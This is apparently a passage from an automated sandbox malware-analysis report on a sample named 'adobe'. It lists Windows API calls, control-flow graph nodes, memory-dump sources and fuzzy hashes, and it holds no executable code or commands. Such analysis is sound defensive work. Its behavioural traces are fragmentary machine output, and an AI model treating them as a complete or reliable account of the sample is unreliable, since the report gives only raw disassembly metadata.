                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02297D18,00409A90), ref: 00409A5C
                                                                                                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02297D18), ref: 0040966C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                                                                          • String ID: D
                                                                                                                                                          • API String ID: 3356880605-2746444292
                                                                                                                                                          • Opcode ID: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                                                                                                          • Instruction ID: 0d26ff0b069f05ac7fc2137d7bf6f4c2b599b29ad8a4266bf43483a79dbd8d3d
                                                                                                                                                          • Opcode Fuzzy Hash: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                                                                                                          • Instruction Fuzzy Hash: CB1142B17442486EDB10EBE68C52FAEB7ACEF49714F50017BB604F72C2DA785D048A69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 116 401918-40193a RtlInitializeCriticalSection 117 401946-40197c call 4012dc * 3 LocalAlloc 116->117 118 40193c-401941 RtlEnterCriticalSection 116->118 125 4019ad-4019c1 117->125 126 40197e 117->126 118->117 130 4019c3-4019c8 RtlLeaveCriticalSection 125->130 131 4019cd 125->131 127 401983-401995 126->127 127->127 129 401997-4019a6 127->129 129->125 130->131
                                                                                                                                                          APIs
                                                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                          • String ID: Z
                                                                                                                                                          • API String ID: 730355536-4052018393
                                                                                                                                                          • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                                          • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                                                                          • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                                          • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message
                                                                                                                                                          • String ID: .tmp$y@
                                                                                                                                                          • API String ID: 2030045667-2396523267
                                                                                                                                                          • Opcode ID: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                                                                                                          • Instruction ID: 9654b09d82b51144a4098a2dc8db18680232f6f81bb165c1e960a0c4f18209d5
                                                                                                                                                          • Opcode Fuzzy Hash: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                                                                                                          • Instruction Fuzzy Hash: 6F419F30600204DFC715EF29DE91A5A7BA6FB89304B10453AF801B73E2DB79AC01DBAD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message
                                                                                                                                                          • String ID: .tmp$y@
                                                                                                                                                          • API String ID: 2030045667-2396523267
                                                                                                                                                          • Opcode ID: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                                                                                          • Instruction ID: 26cc71b999f7f6bdec311d51aeea5e314170344188b91b932b157060f98f8833
                                                                                                                                                          • Opcode Fuzzy Hash: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                                                                                          • Instruction Fuzzy Hash: C5418030600204DFC715EF29DE91A5A7BA5FB49304B10453AF801B73E2CB79AC41DB9D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                          • String ID: .tmp
                                                                                                                                                          • API String ID: 1375471231-2986845003
                                                                                                                                                          • Opcode ID: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                                                                                          • Instruction ID: 7d66a9fb3acca2a164fab1eb31a00c007328e74e7b0c548e792a27499ccb9c3a
                                                                                                                                                          • Opcode Fuzzy Hash: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                                                                                          • Instruction Fuzzy Hash: A1213574A002099BDB05FFA1C9429DFB7B9EF88304F50457BE901B73C2DA7C9E059AA5
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 277 401430-40143d 278 401446-40144c 277->278 279 40143f-401444 277->279 280 401452-40146a VirtualAlloc 278->280 279->280 281 40146c-40147a call 4012e4 280->281 282 40148f-401492 280->282 281->282 285 40147c-40148d VirtualFree 281->285 285->282
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                          • String ID: Z
                                                                                                                                                          • API String ID: 2087232378-4052018393
                                                                                                                                                          • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                          • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                                                                          • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                          • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 346 407749-40774a 347 4076dc-4076e6 WriteFile 346->347 348 40774c-40776f 346->348 350 4076e8-4076ea call 40748c 347->350 351 4076ef-4076f2 347->351 349 407770-407785 348->349 354 407787 349->354 355 4077f9 349->355 350->351 352 407700-407704 351->352 353 4076f4-4076fb call 4073ec 351->353 353->352 358 40778a-40778f 354->358 359 4077fd-407802 354->359 360 40783b-40783d 355->360 361 4077fb 355->361 364 407803-407819 358->364 366 407791-407792 358->366 359->364 362 407841-407843 360->362 361->359 365 40785b-40785c 362->365 364->365 376 40781b 364->376 367 4078d6-4078eb call 407890 InterlockedExchange 365->367 368 40785e-40788c 365->368 369 407724-407741 366->369 370 407794-4077b4 366->370 391 407912-407917 367->391 392 4078ed-407910 367->392 384 407820-407823 368->384 387 407890-407893 368->387 373 407743 369->373 374 4077b5 369->374 370->374 379 407746-407747 373->379 380 4077b9 373->380 382 4077b6-4077b7 374->382 383 4077f7-4077f8 374->383 377 40781e-40781f 376->377 377->384 379->346 385 4077bb-4077cd 379->385 380->385 382->380 383->355 388 407824 384->388 389 407898 384->389 385->362 390 4077cf-4077d4 385->390 387->389 393 407825 388->393 394 40789a 388->394 389->394 390->360 398 4077d6-4077de 390->398 392->391 392->392 396 407896-407897 393->396 397 407826-40782d 393->397 399 40789f 394->399 396->389 400 4078a1 397->400 401 40782f 397->401 398->349 409 4077e0 398->409 399->400 406 4078a3 400->406 407 4078ac 400->407 403 407832-407833 401->403 404 4078a5-4078aa 401->404 403->360 403->377 408 4078ae-4078af 404->408 406->404 407->408 408->399 410 4078b1-4078bd 408->410 409->383 410->389 411 4078bf-4078c0 410->411
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
• Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
• Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
• Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
  • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
  • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
  • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
  • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
• String ID:
• API String ID: 296031713-0
• Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
• Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
• Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
• Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401631
Strings
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: AllocVirtual
• String ID: Z
• API String ID: 4275171209-4052018393
• Opcode ID: 41bc2e58eb8df21134a81ecef240e945b9dbf0f5d11c2332597d90ea76119035
• Instruction ID: 625cd896077d7ae42c8eb3362da321aaa2c87eddc2731790e4d257a04fee8ae6
• Opcode Fuzzy Hash: 41bc2e58eb8df21134a81ecef240e945b9dbf0f5d11c2332597d90ea76119035
• Instruction Fuzzy Hash: 95113072A057019FC3109F19CD80A2BB7E5EBC4750F19CA3DE598A73A5D635AC408699
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: FreeVirtual
• String ID: Z
• API String ID: 1263568516-4052018393
• Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
• Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
• Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
• Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00008000), ref: 00406FAA
• LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
• Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
• Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
• Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
• GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022803AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
• Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
• Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
• Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
Uniqueness

Uniqueness Score: -1.00%

APIs
• ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
• GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID:
• API String ID: 1948546556-0
• Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
• Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
• Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
• Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
• GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022803AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
• Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
• Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
• Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
  • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
  • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
• Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
• Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
• Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
• Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
• Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
• Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
• Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
• Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
• Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
• Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
• Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
Uniqueness
• Uniqueness Score: -1.00%

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
